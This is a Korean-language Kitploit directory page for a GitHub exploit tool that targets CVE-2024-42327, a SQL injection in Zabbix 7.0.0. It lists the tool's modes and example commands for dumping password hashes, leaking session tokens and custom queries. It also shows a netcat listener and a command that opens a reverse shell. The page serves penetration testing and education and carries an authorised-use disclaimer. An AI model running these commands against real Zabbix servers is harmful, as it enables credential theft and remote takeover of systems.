Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-42327_Zabbix_SQLi — 이는 교육 목적으로만 사용됩니다. 인가되지 않은 시스템에 대해 사용하지 마십시오. | Kitploit
도구/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

이는 교육 목적으로만 사용됩니다. 인가되지 않은 시스템에 대해 사용하지 마십시오.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
11년 전아직 검토되지 않음
공유

🛡️ Zabbix 7.0.0 SQL 인젝션 익스플로잇 스크립트

Zabbix 7.0.0 인증된 SQL 인젝션 취약점을 익스플로잇하는 파이썬 스크립트로, 사용자 데이터 추출, 세션 토큰 유출, 원격 명령 실행(RCE), 사용자 정의 쿼리 인젝션 등 여러 동작 모드를 지원합니다.

⚠️ 면책 조항:
이 스크립트는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다.
소유하지 않거나 테스트에 대한 명시적 허가가 없는 시스템에서는 사용하지 마십시오.
저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.


✨ 기능

  • ✅ Zabbix 7.0.0 대상 인증된 SQL 인젝션
  • 🧑‍💻 데이터베이스에서 사용자 해시 덤프
  • 🔐 세션 토큰 유출
  • 🐚 리버스 셸을 통한 원격 코드 실행 (관리자 토큰 필요)
  • 🧠 사용자 정의 SQL 쿼리 실행

🔧 요구 사항

  • Python 3.6+
  • requests 라이브러리

필요시 요구 사항 설치:

root@kitploit:~
pip install requests

🚀 사용법

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 사용 가능한 모드

모드설명관리자 토큰 필요
leak-users모든 사용자 ID, 사용자명, 비밀번호 해시, 역할 덤프❌
leak-tokens데이터베이스에서 모든 활성 세션 ID 덤프❌
rceitem.create 익스플로잇을 통해 리버스 셸 생성✅
custom인젝션을 통해 모든 사용자 정의 SQL 쿼리 실행❌

🧪 예제

사용자 해시 덤프

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

세션 토큰 유출

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

원격 코드 실행 (리버스 셸)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

사용자 정의 SQL 인젝션

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 프로젝트 구조

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 저자

Anthony (@874anthony)

사랑과 호기심으로 제작 🐍


🔐 라이선스

이 프로젝트는 MIT 라이선스 하에 배포됩니다. 책임감 있게 사용해 주세요.

도구 다운로드